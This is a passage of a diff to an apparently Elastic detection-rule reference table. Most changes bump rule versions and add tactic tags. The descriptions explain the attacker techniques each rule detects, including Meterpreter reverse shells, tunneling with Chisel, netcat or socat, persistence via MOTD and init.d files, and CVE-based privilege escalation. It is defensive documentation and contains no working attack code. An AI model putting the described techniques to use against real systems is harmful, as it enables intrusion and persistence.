This could indicate the attempt to masquerade as system executables or backdoored and resigned legitimate executables. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR] |8.3.0 |1 +|<<potential-masquerading-as-system32-executable, Potential Masquerading as System32 Executable>> |Identifies suspicious instances of default system32 executables, either unsigned or signed with non-MS certificates. This could indicate the attempt to masquerade as system executables or backdoored and resigned legitimate executables. 
|[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR] |8.3.0 |2 -|<<potential-masquerading-as-vlc-dll, Potential Masquerading as VLC DLL>> |Identifies instances of VLC-related DLLs which are not signed by the original developer. Attackers may name their payload as legitimate applications to blend into the environment, or embedding its malicious code within legitimate applications to deceive machine learning algorithms by incorporating authentic and benign code. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR] |8.3.0 |1 +|<<potential-masquerading-as-vlc-dll, Potential Masquerading as VLC DLL>> |Identifies instances of VLC-related DLLs which are not signed by the original developer. Attackers may name their payload as legitimate applications to blend into the environment, or embedding its malicious code within legitimate applications to deceive machine learning algorithms by incorporating authentic and benign code. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR] |8.3.0 |2 -|<<potential-meterpreter-reverse-shell, Potential Meterpreter Reverse Shell>> |This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.6.0 |1 +|<<potential-meterpreter-reverse-shell, Potential Meterpreter Reverse Shell>> |This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.6.0 |2 |<<potential-microsoft-office-sandbox-evasion, Potential Microsoft Office Sandbox Evasion>> |Identifies the creation of a suspicious zip file prepended with special characters. Sandboxed Microsoft Office applications on macOS are allowed to write files that start with special characters, which can be combined with an AutoStart location to achieve sandbox evasion. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 |<<potential-modification-of-accessibility-binaries, Potential Modification of Accessibility Binaries>> |Windows contains accessibility features that may be launched with a key combination before a user has logged in. An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-network-scan-detected, Potential Network Scan Detected>> |This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. 
By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule proposes threshold logic to check for connection attempts from one source host to 20 or more destination ports. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |3 +|<<potential-network-scan-detected, Potential Network Scan Detected>> |This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule proposes threshold logic to check for connection attempts from one source host to 20 or more destination ports. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |4 + +|<<potential-network-scan-executed-from-host, Potential Network Scan Executed From Host>> |This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-network-share-discovery, Potential Network Share Discovery>> |Adversaries may look for folders and drives shared on remote systems to identify sources of information to gather as a precursor for collection and identify potential systems of interest for Lateral Movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |1 +|<<potential-network-share-discovery, Potential Network Share Discovery>> |Adversaries may look for folders and drives shared on remote systems to identify sources of information to gather as a precursor for collection and identify potential systems of interest for Lateral Movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Rule Type: BBR] |8.3.0 |2 -|<<potential-network-sweep-detected, Potential Network Sweep Detected>> |This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination hosts on commonly used network services. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |3 +|<<potential-network-sweep-detected, Potential Network Sweep Detected>> |This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. 
This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination hosts on commonly used network services. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |4 |<<potential-non-standard-port-http-https-connection, Potential Non-Standard Port HTTP/HTTPS connection>> |Identifies potentially malicious processes communicating via a port paring typically not associated with HTTP/HTTPS. For example, HTTP over port 8443 or port 440 as opposed to the traditional port 80 , 443. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-non-standard-port-ssh-connection, Potential Non-Standard Port SSH connection>> |Identifies potentially malicious processes communicating via a port paring typically not associated with SSH. For example, SSH over port 2200 or port 2222 as opposed to the traditional port 22. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [OS: macOS], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-non-standard-port-ssh-connection, Potential Non-Standard Port SSH connection>> |Identifies potentially malicious processes communicating via a port paring typically not associated with SSH. For example, SSH over port 2200 or port 2222 as opposed to the traditional port 22. 
Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [OS: macOS], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-openssh-backdoor-logging-activity, Potential OpenSSH Backdoor Logging Activity>> |Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-openssh-backdoor-logging-activity, Potential OpenSSH Backdoor Logging Activity>> |Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<potential-outgoing-rdp-connection-by-unusual-process, Potential Outgoing RDP Connection by Unusual Process>> |Adversaries may attempt to connect to a remote system over Windows Remote Desktop Protocol (RDP) to achieve lateral movement. Adversaries may avoid using the Microsoft Terminal Services Client (mstsc.exe) binary to establish an RDP connection to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |1 
@@ -1152,11 +1194,11 @@ and their rule type is `machine_learning`. |<<potential-password-spraying-of-microsoft-365-user-accounts, Potential Password Spraying of Microsoft 365 User Accounts>> |Identifies a high number (25) of failed Microsoft 365 user authentication attempts from a single IP address within 30 minutes, which could be indicative of a password spraying attack. An adversary may attempt a password spraying attack to obtain unauthorized access to user accounts. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.3.0 |102 -|<<potential-persistence-through-motd-file-creation-detected, Potential Persistence Through MOTD File Creation Detected>> |Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |5 +|<<potential-persistence-through-motd-file-creation-detected, Potential Persistence Through MOTD File Creation Detected>> |Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. 
These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |6 -|<<potential-persistence-through-run-control-detected, Potential Persistence Through Run Control Detected>> |This rule monitors the creation/alteration of the rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. The rc.local file has mostly been replaced by Systemd. However, through the "systemd-rc-local-generator", rc.local files can be converted to services that run at boot. Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |106 +|<<potential-persistence-through-run-control-detected, Potential Persistence Through Run Control Detected>> |This rule monitors the creation/alteration of the rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. The rc.local file has mostly been replaced by Systemd. However, through the "systemd-rc-local-generator", rc.local files can be converted to services that run at boot. 
Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |107 -|<<potential-persistence-through-init-d-detected, Potential Persistence Through init.d Detected>> |Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the "systemd-sysv-generator" can convert init.d files to service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |5 +|<<potential-persistence-through-init-d-detected, Potential Persistence Through init.d Detected>> |Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the "systemd-sysv-generator" can convert init.d files to service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |6 |<<potential-persistence-via-atom-init-script-modification, Potential Persistence via Atom Init Script Modification>> |Identifies modifications to the Atom desktop text editor Init File. 
Adversaries may add malicious JavaScript code to the init.coffee file that will be executed upon the Atom application opening. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 
@@ -1164,9 +1206,9 @@ and their rule type is `machine_learning`. |<<potential-persistence-via-periodic-tasks, Potential Persistence via Periodic Tasks>> |Identifies the creation or modification of the default configuration for periodic tasks. Adversaries may abuse periodic tasks to execute malicious code or maintain persistence. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<potential-persistence-via-time-provider-modification, Potential Persistence via Time Provider Modification>> |Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<potential-persistence-via-time-provider-modification, Potential Persistence via Time Provider Modification>> |Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<potential-port-monitor-or-print-processor-registration-abuse, Potential Port Monitor or Print Processor Registration Abuse>> |Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<potential-port-monitor-or-print-processor-registration-abuse, Potential Port Monitor or Print Processor Registration Abuse>> |Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<potential-powershell-hacktool-script-by-function-names, Potential PowerShell HackTool Script by Function Names>> |Detects known PowerShell offensive tooling functions names in PowerShell scripts. Attackers commonly use out-of-the-box offensive tools without modifying the code. This rule aim is to take advantage of that. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: PowerShell Logs] |8.3.0 |6 
@@ -1174,97 +1216,105 @@ and their rule type is `machine_learning`. |<<potential-privacy-control-bypass-via-tccdb-modification, Potential Privacy Control Bypass via TCCDB Modification>> |Identifies the use of sqlite3 to directly modify the Transparency, Consent, and Control (TCC) SQLite database. This may indicate an attempt to bypass macOS privacy controls, including access to sensitive resources like the system camera, microphone, address book, and calendar. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<potential-privilege-escalation-through-writable-docker-socket, Potential Privilege Escalation through Writable Docker Socket>> |This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-privilege-escalation-through-writable-docker-socket, Potential Privilege Escalation through Writable Docker Socket>> |This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend] |8.3.0 |3 + +|<<potential-privilege-escalation-via-cve-2023-4911, Potential Privilege Escalation via CVE-2023-4911>> |This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.6.0 |2 -|<<potential-privilege-escalation-via-cve-2023-4911, Potential Privilege Escalation via CVE-2023-4911>> |This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.6.0 |1 +|<<potential-privilege-escalation-via-container-misconfiguration, Potential Privilege Escalation via Container Misconfiguration>> |This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-privilege-escalation-via-container-misconfiguration, Potential Privilege Escalation via Container Misconfiguration>> |This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-privilege-escalation-via-installerfiletakeover, Potential Privilege Escalation via InstallerFileTakeOver>> |Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |108 -|<<potential-privilege-escalation-via-installerfiletakeover, Potential Privilege Escalation via InstallerFileTakeOver>> |Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |107 +|<<potential-privilege-escalation-via-overlayfs, Potential Privilege Escalation via OverlayFS>> |Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-privilege-escalation-via-overlayfs, Potential Privilege Escalation via OverlayFS>> |Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-privilege-escalation-via-pkexec, Potential Privilege Escalation via PKEXEC>> |Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |106 -|<<potential-privilege-escalation-via-pkexec, Potential Privilege Escalation via PKEXEC>> |Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-privilege-escalation-via-python-cap-setuid, Potential Privilege Escalation via Python cap_setuid>> |This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-privilege-escalation-via-recently-compiled-executable, Potential Privilege Escalation via Recently Compiled Executable>> |This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-privilege-escalation-via-recently-compiled-executable, Potential Privilege Escalation via Recently Compiled Executable>> |This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |2 |<<potential-privilege-escalation-via-sudoers-file-modification, Potential Privilege Escalation via Sudoers File Modification>> |A sudoers file specifies the commands users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |103 -|<<potential-privilege-escalation-via-uid-int-max-bug-detected, Potential Privilege Escalation via UID INT_MAX Bug Detected>> |This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-privilege-escalation-via-uid-int-max-bug-detected, Potential Privilege Escalation via UID INT_MAX Bug Detected>> |This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-privileged-escalation-via-samaccountname-spoofing, Potential Privileged Escalation via SamAccountName Spoofing>> |Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Use Case: Vulnerability] |8.3.0 |105 +|<<potential-privileged-escalation-via-samaccountname-spoofing, Potential Privileged Escalation via SamAccountName Spoofing>> |Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Use Case: Vulnerability] |8.3.0 |106 |<<potential-process-herpaderping-attempt, Potential Process Herpaderping Attempt>> |Identifies process execution followed by a file overwrite of an executable by the same parent process. This may indicate an evasion attempt to execute malicious code in a stealthy way. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 -|<<potential-process-injection-via-powershell, Potential Process Injection via PowerShell>> |Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |107 +|<<potential-process-injection-from-malicious-document, Potential Process Injection from Malicious Document>> |Identifies child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel) with unusual process arguments and path. This behavior is often observed during exploitation of Office applications or from documents with malicious macros. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Tactic: Initial Access], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-protocol-tunneling-via-chisel-client, Potential Protocol Tunneling via Chisel Client>> |This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. 
Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-process-injection-via-powershell, Potential Process Injection via PowerShell>> |Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 -|<<potential-protocol-tunneling-via-chisel-server, Potential Protocol Tunneling via Chisel Server>> |This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-protocol-tunneling-via-chisel-client, Potential Protocol Tunneling via Chisel Client>> |This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. 
Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-protocol-tunneling-via-earthworm, Potential Protocol Tunneling via EarthWorm>> |Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-protocol-tunneling-via-chisel-server, Potential Protocol Tunneling via Chisel Server>> |This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the 